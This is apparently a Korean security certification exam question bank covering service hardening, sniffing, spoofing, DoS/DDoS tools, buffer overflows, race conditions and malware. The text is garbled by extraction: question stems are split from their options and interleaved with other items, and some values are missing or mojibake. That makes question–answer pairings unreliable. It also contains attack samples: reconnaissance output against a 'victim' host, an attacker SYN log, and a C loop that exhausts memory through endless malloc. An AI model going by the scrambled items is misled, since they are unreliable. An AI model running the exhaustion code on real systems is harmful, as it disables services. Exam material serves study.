372 18. 인터넷환경에서 서버로 사용될 리눅스 시스 템을 구축하고자 한다고 할 경우, 보안 상 필요 없는 패키지는 설치하지 않도록 권장하고 있다. 패키지 설치 관리에 대한 설명으로 옳지 않은 것 은? 1 X윈도우 자체 또는 X윈도우와 관련된 패키지 는 될 수 있으면 설치를 피한다. 2 멀티미디어 어플리케이션 중 real-audio/video 서비스를 계획하고 있는 경우에는 관련 패키지를 설치한다. 3 스크립트 언어 이외에 인터프리터 언어, 컴파 일러 언어를 초기에 모두 설치한다. 4 NFS, NIS, POP2/2, Samba와 같은 꼭 필요 하지 않은 소프트웨어는 설치하지 않는다. 19. 시스템에서 RPC 서비스를 보기 위해서 rpcinfo -p localhost 실행하는데, rpc 명령어들을 확인 후 서비스 중 보안에 취약한 서비스에 대한 제어가 필요하다. 환경설정 을 하는 방법 중 옳 은 것을 모두 고르면? 1 보안상 취약한 서비스인 ttdb (port 10083) 서비스를 중지한다. 2 보안상 취약한 서비스인 cmsd (port 10068) 서비스를 중지한다. 3 보안상 취약한 서비스인 sadmind (port 10232) 서비스를 중지한다. 4 /etc/inetd.conf 파일에서 불필요한 서비스를 주석처리하거나 또는 삭제한다. 20. 서비스 보안 설명 중 옳지 않은 것은? 21. Spoofing, Hijacking, Sniffing 등의 방식으로 공격이 가능한 근본적인 이유는 무엇인가? 1 TCP/IP의 개방성과 효율을 위한 단순함 2 IPv4의 근원적 문제 3 네트워크 토플로지 구성의 오류 4 잘못된 시스템 설정 22. TFTP 서비스는 보안상 취약하므로 서비스하 지 않는 것이 좋지만 꼭 사용해야 하는 상황이라 면 보안 조치를 해 주어야 한다. 다음 중 적당한 보안조치가 아닌 것은? 1 -s 옵션을 주어 데몬을 띄운다. 2 TCP Wrapper를 설치하여 허용된 IP에서만 접근하도록 한다. 3 chroot를 사용하여 접근 가능한 디렉터리를 제한한다. 4 유추하기 쉬운 패스워드를 사용하지 못하도록 제한한다. 23. 최근 SNMP의 취약성이 속속 발표되고 있다. 다음 중 SNMP에 대한 설명으로 올바르 지 않은 것은? 1 네트워크 자원의 효율적인 관리를 위해 만들 어진 프로토콜이다. 2 UDP 161, 162번 포트를 사용한다. 3 인증상의 결함으로 인하여 장비의 목록을 상세 리스팅하는 기능을 제공한다. 4 암호화가 구현되어 있지 않아 취약성이 존재 한다. 1 echo, discard, daytime, chargen : 실질적인 서비스를 하지 않고, 시스템 디버깅을 위해 사용 2 r 시리즈(rexec, rlogin, rusers, etc) : 인증 과정을 거치지 않고 바로 시스템에 접속 3 rpc 서비스 : rpc 서비스는 지속적으로 취약성 이 발견되고 있으므로 기본적으로 지원되지 않음 4 telnet, ftp 등 실제 서비스에 꼭 필요하지 않는 서비스는 모두 사용 중지 24. NIS에 나타나는 여러 가지 취약성을 방어하 는 방법 중 옳지 않은 것을 고르면? 1 NIS 시스템은 보안상 안전하지 않으므로 DES 를 이용하여 NIS시스템을 사용한다. 2 도메인 이름을 회사 이름으로 만든다. 3 액세스 콘트롤이 가능한 portmap을 사용하여 외부에 맵이 유출되지 않도록 한다. 4 인증 서버를 DMZ 존에 구성하여 접근제어 설정을 한다. 372
373 25. NFS 서비스는 취약성이 지속적으로 나타나 고 있다. NFS 취약성 설명으로 옳지 않은 것은? 1 Host Name의 노출로 외부 비인가자의 공격 에 노출되어 있다. 2 NFS Server의 인증서버로의 공격 취약성이 알려져 있다. 3 NFS Relay 공격 취약성이 알려져 있다. 4 RPC service 취약성이 알려져 있다. 1 /usr 디렉터리는 victim1.site.com에서 접근이 가능한 디렉터리임을 표시하고 있다. 2 /usr, /home 디렉터리는 누구나 접근이 가능 하도록 설정이 되어 있다. 3 "rpcinfo -p" 명령어 사용 시 메시지에 port mapper 라는 데몬이 먼저 떠 있어야 NFS를 사용할 수 있다. 4 공유된 자원을 공격하는 기법으로 showmount 명령을 사용해 디렉터리 공유 상태를 알 수 있다. 26. 아래 보기는 일정기간동안 네트워크를 모니 터링한 결과 지속적인 공격시도를 받는 포트들을 정리한 것이다. 다음 중 해당 포트와 공격시도에 대한 내용이 올바르지 않은 것은? 1 Port 53 - BIND 취약성 공격 시도 2 Port 80 - Code Red 등 웹 접속을 이용하는 공격 시도 3 Port rpc.statd의 취약성 공격 시도 4 Port NETBIOS 공격 시도 27. 아래에서 보여주는 메시지에 대한 설명으로 옳지 않은 것은? # rpcinfo -p victim.site.com program vers proto port service tcp 111 portmapper ucp 111 portmapper udp 864 rquotad udp 864 rquotad tcp 111 mountd udp 111 mountd tcp 1183 mountd udp 4966 mountd udp 2049 nfs # showmount -e victim.site.com /usr victim1.site.com /home 28. 시스템이 취약성이 있는지 점검하는 방법에 대한 설명이다. 다음 중 옳은 것을 모두 고르면? 1 rc.boot, rc.local(sysv : /etc/rc?.d/*)나 기타 시스템 시작 시 실행 파일들을 점검한다. 2 inetd.conf 와 /etc/services 파일에서 침입자 가 추가한 불법 프로그램 서비스가 있는지 점 검한다. 3 /etc/hosts.equiv 파일에 '+'가 있는지 점검한 다. 4 /etc/passwd 파일의 복사본을 저장한 후 su 및 passwd 프로그램이 백도어(Back door)로 사용되는지 확인한다. 29. 다음 중 TCP Connection Hijacking의 예방책 이 아닌 것은? 1 IDS 설치 2 Kerberos 3 IPSEC 이용 4 Digital Signature Mechanism 사용 30. 시스템의 과부하로 서비스가 중지되는 서비 스거부공격에 대한 적절한 대응책이 아닌 것은? 1 공격 교란을 위해 다양한 백도어 및 네트워크 점검 프로그램을 설치 2 정상보다 유난히 많은 로그온 시도 시 시스템 점검 3 서버에 등록된 계정의 권한을 최소화 4 웹서버인 경우 최소한의 권한으로 CGI 프로그램 수행 373
374 31. Switched Network에서 Sniffing을 막기 위한 방법이 아닌 것은? 35. 인터넷 브라우저 공격에 대한 대처 방법으로 틀린 것은? 1 IP Filtering 2 Port Security 3 EtherChannel Security 4 Routing Security 32. 네트워크 Sniffing 공격의 대책으로 다음 항 목 중 옳지 않은 것은? 1 VPN 구성 2 DMZ zone 구성 3 Single sign On 4 SSL 33. 경쟁 상태(Race Condition) 공격을 막을 수 있는 방지책으로 가장 적절치 못한 것은? 1 파일이 존재하지 않은 경우에만 파일을 생성 하도록 프로그램 한다. 2 SETUID가 설정된 파일을 모두 찾아 해제한다. 3 임시파일을 생성할 경우에는 추측이 불가능 하도록 한다. 4 임시파일을 생성할 경우 생성된 파일이 심볼릭 링크인지를 검사한다. 34. 인스턴트 메시징(IM : Instant Messaging, 예: MSN 메신저, 넷미팅)공격 대처 방안이 아닌 것 은? 1 신뢰할 수 없는 원본으로부터는 파일을 받지 않는다. 2 백신 프로그램을 사용한다. 3 최신 버전의 IM 클라이언트를 사용하고 가능 하면 IP 주소를 공개한다. 4 기본디렉터리를 변경하여 사용한다. 1 최신 버전의 브라우저와 보안 패치 설치 및 백신 프로그램 사용 2 신뢰할 수 없는 웹사이트(악성 사이트)를 피한다. 3 인터넷 익스플로러 사용자의 경우 도구-> 인터넷 옵션->보안 에서 자바와 Active X 사용 으로 설정한다. 4 Active X의 경우 신뢰할 수 있는 코드만 실행 (전자 서명된 코드만을 실행)한다. 36. 해커의 취약성 시험 방법을 알기위한 Honeypot의 종류가 아닌 것은? 1port monitors 2 deception systems 3 multi-protocol deception systems 4 collection systems 37. 해커의 취약성 시험 방법을 알기 위한 Honeypot의 장점으로 틀린 것은? 1 해킹에 대한 초기 알람을 제공한다. 2 해킹 기술에 대한 정보를 제공한다. 3 해킹의 탐지와 복구 기술에 대해 습득할 수 있다. 4 다른 시스템이나 네트워크를 더 이상 스캔 하지 못하게 한다. 374
375 38. Sendmail은 취약성이 지속적으로 나오는 서비스이다. 이 서비스에 대한 취약성을 보완해 주는 smrsh(sendmail restricted shell)에 대해 틀 린 것은? 42. 프로토콜의 구조상 취약성을 이용한 최초 시 도로 유명한 Mitnick 공격은 SYN flooding 기법 과 TCP hijacking을 이용한다. 다음 중 Mitnick 공격에 대한 설명으로 틀린 것은? 1 sendmail의 취약성(예: pipes의 취약성)을 이용하여 일반사용자가 임의의 프로그램을 실 행하는 것을 막는다. 2 sendmail과 함께 사용할 때, 실행 가능한 프 로그램의 리스트를 제한한다. 3 sendmail에 문제가 생겼을 시 자동적으로 관 리자에게 메일을 보낸다. 4 smrsh의 제한된 유틸리티를 모아두는 디렉터 리는 /usr/libexec/sm.bin이다. 1 공격대상을 선정하기 위해서 finger, rpcbind, showmount 등을 이용했다. 2 공격자는 SYN 패킷을 지속적으로 보내서 공격대상서버와 TCP 연결 중인 서버를 서비스불능상태로 만든다. 3 공격자는 공격대상서버의 윈도우 사이즈 변화 를 예측할 수 있어야 한다. 4 공격대상서버의 X-terminal을 이용하여 접근 권한을 얻는다. 39. ICMP Smurf 공격을 방지하기 위한 방법 중 적절하지 않은 것은? 1 라우터에서 Direct Broadcast를 Disable시킨다. 2 IP Broadcast 주소로 도착한 ICMP 패킷에 대한 Reply를 금지시킨다. 3 라우터의 Ingress Filtering을 이용하여 Spoof 된 패킷을 막는다. 4 65,535bytes보다 큰 ICMP Echo 패킷을 IP Fragmentation을 이용하여 전송한다. 40. Honeypot Redirection에 대한 설명으로 적절 치 않은 것은? 1 재전송된 트래픽의 속도 제한(rate -limit ) 2 Honeypot으로 재전송된 모든 흐름(flow)에 대해 기록 3 투명한 NAT(Network Address Translation)를 통해 실제 목적지 IP 주소를 honeypot 서버 주소로 변경 4 의심스러운 트래픽을 honeypot 이외의 서버로 재전송 43. 네트워크 스니핑을 방지하기 위한 방법 중 하나로 스위치 또는 스위칭 허브를 사용하는데, 이러한 환경에서 스니핑하는 방법 중 옳지 않은 것은? 1 Switch Jamming 2 ARP Redirect 공격 3 ICMP Redirect 공격 4 ICMP Spoofing 공격 44. 다음 중 스푸핑 공격 기법에 대한 설명이 맞 는 것은? 1 네트워크 사용자의 계정을 불법적으로 획득 하는 기술 2 패킷에 다른 주소를 삽입하여 발신지를 가장 하여 공격하는 기법 3 마지막 몇 개의 숫자를 자르는 방법 4 시스템에 과부하를 주어 작동 중지 및 서비스 거부를 하게 하는 방법 41. 아래의 공격 중 피해 형태가 다른 하나는? 1 버퍼오버플로(Buffer Overflow) 2 스머프(Smurf) 3 SYN Flooding 4 Teardrop 375
376 45. 버퍼 오버플로에 대한 설명으로 잘못된 것 은? 49. Switched Network에서의 스푸핑 방법이 아 닌 것은? 1 main프로그램과 sub프로그램의 경쟁 관계와 setuid를 이용하여 공격하는 패턴이 존재한다. 2 스택의 일정 부분에 exploit code를 실행시켜 root 권한으로 setuid가 설정된 프로그램을 실행시킨다. 3 소유자가 root인 setuid가 설정된 응용프로 그램의 경우 exploit code를 활용하여 root 권한을 탈취한다. 4 Character size에 대한 체크를 하지 않는 취약성을 공격하여 root 권한을 탈취한다. 46. IP Spoofing을 응용한 해킹 기법이 아닌 것 은? 1SYN Flooding 2Race Condition 공격 3Connection Hijacking 4 ARP Redirect 공격 1 arp spoofing 2MAC Flooding 3 MAC Duplicating 4 port spoofing 50. DoS 공격에 대한 설명으로 잘못된 것은? 1 익스플로잇을 사용하여 특정 계정에 대한 권한을 탈취 2 서비스 대기중인 포트에 특정 패킷을 다량 보내 서비스를 불가능하게 함 3 특정 프로토콜에 집중 공격하여 서비스를 불 가능하게 함 4 다량의 패킷을 대상 서버에 전송하여 서비스 를 불가능하게 함 51. 다음은 해킹 기법에 대한 설명이다. 경쟁 상 태 공격이 발생하는 경우와 관계있는 것을 모두 고르면? 47. 야후, CNN과 같은 대형 사이트가 공격당한 기법으로 시스템에 과부하를 주어 해당 서비스를 하지 못하도록 하는 공격 방법은? 1 분산 서비스 거부 (DDoS) 2 비동기적 공격 (Asynchronous Attack) 3 회선 도청 (Wire Tapping) 4 논리 폭탄 (Logic Bomb) 48. 허가받지 않은 사용자가 마치 허가받은 사용 자인 것처럼 정보를 전송하는 형태의 공격을 다 음 중 무엇이라 하는가? 1 변조 2 스니퍼링 3 차단 4 위조 1 Permission 점검을 위한 access() & open() 실행 2 임시파일(temp file) 이름 선택 & create(), delete() 3 파일이름을 반복적으로 재사용하는 경우 4 파일 소유자/모드 변경 & 점검 52. 다음 설명에 해당되는 공격 유형은? 두 개의 프로세스 사이의 수행 시간차를 이용 하여 그 시간차 사이에 공격자가 원하는 다른 프로세스를 수행하는 공격 기법 1Hip Based Buffer Overflow 2Stack Based Buffer Overflow 3Format String 4 Race Condition 376
377 53. 다음 설명에 해당되는 공격 유형은? 이 공격은 TCP의 three handshake 연결 방식 의 구조적 문제점을 이용한 공격이다. 특정 포트에 대해 공격자가 SYN 패킷을 보내 면 공격 대상 서버는 SYN/ACK 패킷을 보낸 다. 이 때 공격자가 ACK 패킷을 보내면 TCP 연결이 완성되는데, SYN/ACK 패킷을 받은 후 ACK 패킷을 보내지 않으면 공격 대상 서버는 ACK 패킷을 일정시간 동안 기다리다(half open 상태) 다시 정상상태로 돌아온다. 이 상 태에서 공격자가 계속해 SYN 패킷만 보내고 ACK 패킷을 보내지 않으면, 공격 대상 서버 는 순간적으로 많은 양의 ACK 접속을 대기하 다가 더 이상 해당 포트에 대해 SYN 패킷을 받지 못해 서비스를 하지 못하는 상태가 된 다. 1 Buffer Overflow 2 Sniffing 3 Format string 4 SYN Flooding 56. 네트워크 상에서 전송되는 패킷을 엿보는 행 위를 무엇이라 하는가? 1 변조 2 스푸핑 3 스니핑 4 차단 57. 주로 패킷 필터를 통과하거나, 발신지 주소를 속이기 위해 쓰이는 해킹기법은 다음 중 어떤 것 인가? 1Spoofing 2 Sniffing 3 Hijacking 4 Ping of Death 58. 네트워크 공격 유형 중 정상적인 서비스가 이루어지지 못하게 하는 형태 공격으로, 서비스 거부 공격 등의 공격 기법을 포함하는 공격 유형 은 다음 중 무엇인가? 1 위조 2 스푸핑 3 태핑 4 차단 54. 일반적인 해킹에 관한 단계를 나열한 것이다. 순서상 옳은 것은? 1 스니퍼 설치- 포트 스캔- 백도어 설치- 로그 삭제 2 공격 시도 후 root 권한 획득- 백도어 설치- 로그삭제 3 포트스캔- 스니퍼 설치- 로그 삭제- 백도어 설치 4 포트스캔- 공격 시도 후 root 권한 획득- 로그삭제- 백도어 설치 59. 해킹 기법을 네트워크를 통한 리모트 공격과 로컬 시스템상의 로컬공격으로 구분할때, 다음 중 그 성격이 다른 하나는 무엇인가? 1 Connection Hijacking 2 SYN Flooding 3 Race Condition Attack 4 Connection Killing by RST 60. DoS 공격에 대한 설명으로 바른 것은? 55. 네트워크 관련 설정 및 취약성을 통한 공격 의 형태에는 여러 가지가 있다. 아래 보기에서 공격의 형태, 프로토콜, 공격의 결과로 틀리게 짝 지어져 있는 것은? 1 SYN flooding - TCP - 네트워크 서비스 거부 2 teardrop - UDP - 시스템 거부 3 UDP Storming - UDP - 시스템 자원 고갈로 인한 거부 현상 4 smurf - ICMP - network bandwidth 소비로 인한 시스템 부하 1 내부 네트워크 패킷을 분석하여 호스트가 있는 네트워크에 접근하는 공격이다. 2 분산 서비스거부공격은 기존의 서비스 거부 공격과 공격기법 자체가 다르다. 3 서비스거부공격은 시스템에 침투하기 위한 것이 아니므로 호스트의 사용자 권한을 획득 할 필요가 없다. 4 공격이 완료되면 호스트의 데이터가 파괴 되거나 변조될 가능성은 없다. 377
378 61. 네트워크 공격 중 Broadcast Storm을 올바르 게 설명한 것은? 1 라우터에 의해 전송되는 출발지 주소가 없는 패킷 2 리피터에 의해 전송되는 목적지 없는 패킷 3 네트워크에 브로드캐스트 스톰이 너무 많이 발생하여 네트워크의 대역폭이 포화상태가 되도록 하는 것 4 네트워크에서 브로드캐스트 스톰이 너무 적게 발생하여 네트워크의 대역폭이 포화상태가 되도록 하는 것 62. 공격자가 위장된 컴퓨터 단말기를 이용하여 서로 인증되어 통신하는 단말기와 컴퓨터의 데이 터 통신에 몰래 연결하는 공격을 일컬어 무엇이 라 하는가? 1 터널링(Tunneling) 공격 2 살라미(Salami) 공격 3 세션 하이재킹(Session hijacking) 공격 4 비동기(Asynchronous) 공격 66. 최근 SMTP 보안의 가장 큰 이슈가 되고 있 는 SPAM Relay Attack에 대한 설명 중 맞는 것은? 1 Windows 시스템에 헤더가 조작된 일련의 IP 패킷 조각을 전송하여 공격 2 상업적 메일이나 광고를 보내는 행위 3 TCP/IP 프로토콜의 호스트 인증과 Sequence number 생성 취약성을 이용 4 두 개의 프로세스 사이의 수행 시간차를 이용 하여 공격 67. 다음 중 최근 해킹 공격 기법의 특징에 대한 설명 중 바르지 않은 것은? 1 은밀화(Underground) 2 은닉화(Stealth) 3 분산화(Distribution) 4 자동화(Automation) 68. 다음 중 DoS 공격에 대한 설명으로 옳지 않 은 것은? 63. Mail Relay Attack과 관련된 공격 유형은? 1DoS 2 IP Spoofing 3 Spam 4 Information Gathering 64. 시스템 관리자 또는 사용자가 침입자에게 속 아 시스템 또는 사용자 계정에 관한 정보를 제공 하는 방식의 공격을 무엇이라 하는가? 1 호스트 위장(Transitive Trust) 공격 2 패킷 변조 공격 3 서비스 거부(Denial of Service) 공격 4 사회 공학(Social Engineering)적 공격 65. 다음 중 성격이 나머지 방법들과 다른 공격 방법은 무엇인가? 1 File System Full Attack 2 Infinite Process Creation Attack 3 TearDrop Attack 4 uuencode alias Attack 1 관리자 권한을 획득할 수 있는 효과적인 공격 방법이다. 2 DoS 공격 시 즉각적인 효과를 얻을 수 있을 정도로 시스템에 위력을 미친다. 3 최근에는 분산 DoS 공격이 주를 이루는 침해 사고가 이루어지고 있다. 4 최근 Yahoo 나 아마존 등 대형 서비스가 이 침해사고를 당했다. 69. 다음 중 시스템 내부 DoS 공격 유형인 것 은? 1 teardrop 공격 방법 2 메모리 확장 공격 방법 3 SYN Flooding 공격 방법 4 IP Spoofing 공격방법 378
379 70. TCP header가 2개의 단편(fragment)으로 나 누어질 정도로 작게 분리하여 목적지 TCP 포트 번호가 첫 번째 단편(fragment)에 나타나지 않게 만들어 네트워크 기반 침 입탐지시스템이나 패킷 필터링 장비를 우회하는 공격 기법은 무엇인가? 1 Sniffing 2 Spoofing 3 Fragment Overlap 4 Syn Flooding 71. 스위치 MAC Table에 쓰레기 데이터로 채우 도록 위조된 MAC 주소를 네트워크에 흘린 다. 이런 상태가 계속되면 스위치는 목적지 MAC 주 소를 찾지 못하기 때문에 input 패킷을 브로드캐 스트한다. 스위치의 이런 점을 이용하여 다른 세 그먼트에 전송되는 패킷을 얻어낼 수 있다. 이런 원리를 이용한 공격방법과 거리가 먼 것은? 1 Sniffing 2 Switch Jamming 3 ARP Spoofing 4 Sentinel Tool 72. 다음 중 스텔스 스캔(Stealth scan)의 종류가 아닌 것은? 1 PUSH scan 2 SYN/ACK scan 3 XMAS scan 4 NULL scan 73. 다음 중 버퍼 오버플로에 대한 설명으로 틀 린 것은? 1 지정된 버퍼 크기보다 더 많은 데이터를 입력 해서 프로그램의 오작동을 유발하는 기술을 말한다. 2 대체적으로 입력 문자열의 크기를 점검하지 않는데서 비롯된다. 3 루트 소유의 SUID 프로그램은 버퍼 오버플로 의 좋은 공격대상이다. 4 사용자에게 할당된 디스크 사이즈가 제한되어 있지 않을 때 특히 위험한 공격이다. 74. 아래의 공격 방법을 잘못 설명하고 있는 것 은? 1 경쟁 상태 공격 : 두 개 또는 그 이상의 프로 세스가 하나의 자원을 사용을 위해 다투도록 하여 다른 프로세서의 권한을 이용하는 공격 방법이다. 2 버퍼오버플로 공격 : 지정된 버퍼의 크기보다 더 많은 데이터를 입력해서 프로그램이 비정상적으로 동작하도록 만드는 공격 방법 이다. 3 포맷스트링 공격 : 사전 파일에 있는 단어를 순차적으로 대입하여 암호화된 패스워드와 비교하는 공격 방법이다. 4 서비스 거부공격 :공격대상 서버가 해당 서비스를 하지 못하도록 하는 공격이다. 75. IP Fragmentation은 이기종 네트워크 환경에 서 IP 패킷의 효율적인 전송을 보장해 주고 있지 만 이러한 IP Fragmentation이 가지는 몇 가지 보안 문제점을 이용한 공격기법들이 있다. 아래 설명하고 있는 IP Fragmentation을 이용한 공격 기법으로 맞는 것은? 공격자는 공격용 IP 패킷을 첫 번째 fragment 에서는 패킷 필터링 장비에서 허용하는 http(tcp 80) 포트와 같은 포트번호를 입력한 다. 그리고 두 번째 fragmentation에서는 offset을 아주 작게 조작해서 fragment들이 재조합될 때 두 번째 fragment가첫 번째 fragment의 포트번호가 있는 부분까지 자기 가 원하는 포트번호로 덮어씌우는 방법 1 Tiny Fragment 2 Fragment Overlap 3 Session Hijacking 4 Buffer Overflow 76. 파일시스템 보안 취약성 중 root 소유의 SUID 프로그램의 보안 허점을 이용하는 공격기 법이 아닌 것은? 1 race condition 2 buffer overflow 3 denial of service 4 format string bug 379
380 77. DRDoS(Distributed Reflection Denial of Service:분산반사서비스거부) 공격에 대한 설명으 로 틀린 것은? 1 차세대 DDoS 공격으로 지칭할 정도로 피해 정도와 성공률이 DDoS 공격과 거의 맞먹는다. 2 TCP 프로토콜 및 라우팅 테이블 운영상의 취약성을 이용한다. 3 DRDoS 공격으로 피해를 입을 경우에는 피해 서버의 에이전트를 제거하여야 한다. 4 취약한 포트를 폐쇄하는 방법으로 대처할 수 있다. 78. 서비스 거부 공격은 공격자가 목표가 되는 시스템에 정상적서비스를 하지 못하도록목표 호 스트를 무력화시키는 방법이라고 할 수 있다. 아 래 보기에서 내부 공격 방법으로 시스템 자원(리 눅스 혹은 솔라리스 시스템)을 고갈시킨 공격의 결과로 볼 수 없는 것은? 79. 서비스 거부 공격(DoS)과 분산 서비스 거부 공격(DDoS)의 공통적인 특징이 아닌 것은? 1 서버의 시스템 장악이나 관리자 계정의 획득 이 목표가 아니며 목표 서버의 데이터의 파괴, 삭제, 변조, 유출 이 주 목적이 아니다. 2 공격전 다수의 서버에 에이전트를 설치하며 주서버의 공격명령에 동시에 목표로 하는 시스템을 공격하므로 이를 감지하여도 해결 방안을 만들어 대처하기 힘들다. 3 공격의 원인 및 공격자를 추적하기 힘든 특징 과 시스템마다 도스 공격에 대한 반응이 각각 다를 수 있다. 4 관리자 등의 실수에 의해 발생할 수 있으며 다른 공격의 사전 작업으로 수행하기도 한다. 80. 다음은 침해사고 피해시스템에서 자주 발견 되는 프로그램들이다. 다음 중 프로그램과 설명 이 올바르게 짝지어지지 않은 것은? 1 # netstat -an -f inet grep SYN_RCVD wc -l # ps -ef grep httpd wc -l # df -k Filesystem kbytes used avail capacity Mounted on /dev/sda % /home/member /dev/sda #include void main(){ char c; while(1) c = malloc(10000); } 1 netcat - 범용 네트워크 해킹도구 2 z0ne - 백도어 모음(chfn, chsh, inetd, login 등) 3 chkexploit - linux의 각종 시스템 취약성을 찾아내는 스캐너 4 killinetd - 원격지 호스트의 inetd 데몬을 다운시켜서 네트워크서비스 방해 81. 다음의 messages 로그에서 보이는 공격은 무엇인가? 14:13: Attacker.com > Victim.com.143 : S 14:24: Attacker.com > Victim.com.143 : S 14:35: Attacker.com > Victim.com.143 : S 14:43: Attacker.com > Victim.com.143 : S 14:54: Attacker.com > Victim.com.143 : S 1 SYN 3 POP3 스캔 2 flooding 4 IMAP 스캔 380
381 82. 다음에 열거한 공격 도구들은 무슨 공격을 위한 도구들인가? Trin00, TFN, Shaft 1 버퍼 오버플로 공격 2 분산 서비스 거부 공격 3 IP 스푸핑 4 백도어 설치 83. 다음은 분산서비스 공격인 DDoS 공격 도구 별 통신 특성을 나타낸 것이다. 해당 DDoS 도구 가 사용하는 통신 포트가 잘못 설명된 것은 무엇 인가? 85. 다음 중 호스트 및 네트워크 상에서 스니핑 하고 있는 시스템을 찾기 위한 방법이 아닌 것은 무엇인가? 1 reverse-dns lookup을 수행하는 DNS 트래픽 을 감시한다. 2 non-broadcast로 위조된 ARP request를 보내서 ARP response 응답이 오는 호스트를 찾는다. 3 MAC 주소를 위조하여(로컬 네트워크에 존재 하지 않는 MAC 주소 사용)하여 ping(icmp Echo Request)을 다른 시스템에게 보내서 ping reply를 받는 호스트를 찾는다. 4 호스트에서 "ifconfig -a" 명령을 이용하여 "promiscuous mode"를 확인한다. 1 trin tcp, tcp, tcp, udp 사용해서 통신 2 TFN - TCP syn 패킷을 사용해서 통신 3 Stacheldraht tcp, tcp, ICMP ECHO, ICMP ECHO REPLY 사용해서 통신 4 TFN 통신에 특정 포트가 사용되지는 않고 UDP, ICMP, TCP 등이 복합적으로 사용 해서 통신 86. 다음은 시스코 라우터에서 취할 수 있는 보 안설정의 한 예이다. 아래 내용을 설정함 으로써 막을 수 있는 공격 형태는 무엇인가? Interface ethernet 1/0 rate-limit input access-group conform-action transmit exceed-action drop 84. 공격 방식 중 네트워크 대역폭 사용률을 과 다하게 증가시키는 공격과 상관없는 것은 무엇인 가? 1 Port Scan 2 ICMP Flooding 3 Spoofing 4 Smurf 1 DoS(서비스거부공격) 2 Sniffing 3 Anti virus 4 Spoofing 87. 다음 중 smurf 공격과 fraggle 공격의 주된 차이점은 무엇인가? 1 smurf 공격은 ICMP를 이용하며 fraggle 공격은 UDP를 이용한다. 2 smurf 공격은 UDP기반 공 鳧 見? fraggle 공격은 TCP기반 공격이다. 3 smurf 공격 패킷은 Spoofing될 수 없다. 4 smurf 공격은 UDP를 이용하며 fraggle 공격 은 ICMP를 이용한다. 381
382 88. 다음 설명은 어떤 공격 기법에 대한 내용인 가? 많은 수의 half-open TCP 연결을 시도하여 상대 호스트의 listen queue를 가득 채우 는 기법으로, DOS 공격의 일종 1 IP Spoofing 2 Smurf 공격 3 Ping of Death 4 SYN Flooding 91. 바이러스 백신 프로그램의 바이러스 진단 원 리 설명 중 옳지 않은 것은? 1 바이러스가 가진 내부 알고리즘을 추적하여 점검한다. 2 바이러스가 가진 특정 패턴을 점검한다. 3 감염파일의 특정 패턴을 점검하여 바이러스를 점검한다. 4 바이러스가 실행되는 파일을 점검하여 자동 복구한다. 89. 아래와 같은 증상을 보이는 DDoS 공격 도구 는 무엇인가? 일반적인 Ping과 달리 패킷의 사이즈가 1058 bytes이므로 쉽게 탐지가 가능하다 /dev 디렉터리 밑에 /dev/ptyq 라는 일반 파 일이 존재한다. 프로세스를 숨기기 위해 변조된 /usr/bin/ps 프로그램을 설치하는데 다음과 같은 방 법으로 확인할 수 있다. # strings /usr/bin/ps 주로 snmpxdmid의 buffer overflow 취약성을 이용하여 시스템관리자 권한을 획득한 후 설치되는 것으로 알려져 있다. 1 Trinoo 2 TFN 3 Stacheldraht 4 carko 90. 일반적으로 스니핑을 방지하는 방법으로 스 위칭 허브를 사용하게 된다. 하지만 이 런 스위 칭 환경에서도 스니핑이 가능할 수 있는데, 다음 중 스위칭 환경에서의 스니핑 기법이 아닌 것은 무엇인가? 92. 아래는 악성(불법 CD) 스팸 메일의 헤더 부 분이다. 설명으로 옳지 못한 것을 고르시오 Received : from SpamCD.co.kr ( [xxx.xxx.xxx.xxx]) by sis.or.kr (8.9.2/8.8.8) with ESMTP id TACT for < [email protected]> ; Mon, 6 May :54: (KST) Received : from Spam (Spam.co.kr [xxx.xxx.xxx.xxx}) by SpamCD.or.kr (8.8.8/8.8.8) with SMTP id KKK2002 for < [email protected]> ; Mon, 6 May :53: (KST) Message-ID:<[email protected]> From : " CD맨 " 1 From 헤더는 대부분 가짜이므로 신경 쓸 필요가 없다. 2 스패머가 Spam 이라는 컴퓨터를 이용해 메일 을 보낸 것으로 판단된다. 3 Spam.co.kr에서 SpamCD.co.kr를 경유하여 [email protected]을 최종 목적지로 하고 있다. 4 Message-ID의 내용은 주로 스패머가 임의로 붙이는 것이다. 1 Switch Jamming 2 ARP Redirect 3 ARP Spoofing 4 Spanning Tree 93. 다음의 여러 가지 바이러스 검사법 중에 틀 린 것은 무엇인가? 1 휴리스틱검사법 2 서명 검증법 3 특정위치진단법 4 통계자료진단법 382
383 94. 다음에서 설명하는 악성 소프트웨어는 무엇 인가? 특정 시간이나 조건이 맞는 경우 활동하며 자 기 복제는 불가능하다. 따라서 나타나기 전에 는 탐지가 어렵다 1 바이러스 (Virus) 2 웜 (Worm) 3 트로이 목마 (Trojan Horse) 4 논리 폭탄 (Logic Bomb) 95. 루트킷에 대한 설명 중 잘못된 것은? 98. 다음 중 바이러스의 공격을 효과적으로 방지 하기 위해서 가장 근본적인 절차는 무엇인가? 1 정기적으로 백그라운드에서 최신의 안티 바이러스(anti-virus) 소프트웨어를 실행시킨다. 2 안티바이러스 소프트웨어를 구입하고 모든 서버와 워크스테이션 하드디스크에 설치한다. 3 모든 매체를 통해 입수한 신규 소프트웨어를 실운영 환경에 싣기 전에 별도의 PC에서 바이러스 체크를 한다. 4 바이러스 침입으로부터 전산 장비를 보호하기 위해 전반적인 바이러스 정책을 수립 적용한 다. 1 login 명령의 소스를 바꾸어 특정유저를 무조건 허용하도록 바꾼다. 2 ps 명령어에서 현재 사용하고 있다는 흔적을 없앤다. 3 who 명령어에서 현재 사용하고 있다는 흔적을 없앤다. 4 ARP Redirect 공격을 통해 현재 사용하고 있다는 흔적을 없앤다. 99. 다음 중 그 성격이 다른 것은? 1 바이러스(Virus) 2 웜(Worm) 3 스팸 메일(Spam Mail) 4 논리 폭탄(Logic Bomb) 100. 다음 중 컴퓨터 바이러스의 감염을 예방하 기 위한 방법이 아닌 것은? 96. 최근 이슈가 된 Nimda 웜 바이러스의 전파 방식이 아닌 것은? 1 을 이용한 전파 2 IIS(Internet Information service) 취약성을 이용 3 공유 네트워크를 통한 전파 4 FTP를 이용한 전파 1 정품 소프트웨어를 사용할 경우, 바이러스 엔진 업데이트를 정기적으로 하지 않아도 된다. 2 중요 자료는 자주 정기적으로 백업을 해둔다. 3 네트워크 등을 통한 파일 다운로드는 반드시 바이러스 검사를 한다. 4 바이러스 백신 프로그램을 정기적으로 업데이트한다. 97. 원래는 데이터의 처리 중간에 특별한 논리의 삽입을 허용하는 승인 받은 프로그램 출구이지 만, 이를 통해 승인받지 않은 논리적 접근이 이 루어질 수 있기 